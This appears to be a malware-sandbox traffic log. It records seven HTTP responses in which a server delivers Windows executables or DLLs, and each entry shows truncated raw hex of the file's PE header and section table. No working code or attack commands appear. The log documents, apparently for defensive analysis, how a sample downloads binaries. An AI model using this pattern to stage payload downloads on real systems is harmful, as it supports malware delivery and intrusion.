Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:27:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:27:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:27:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:27:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:27:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:27:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:27:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
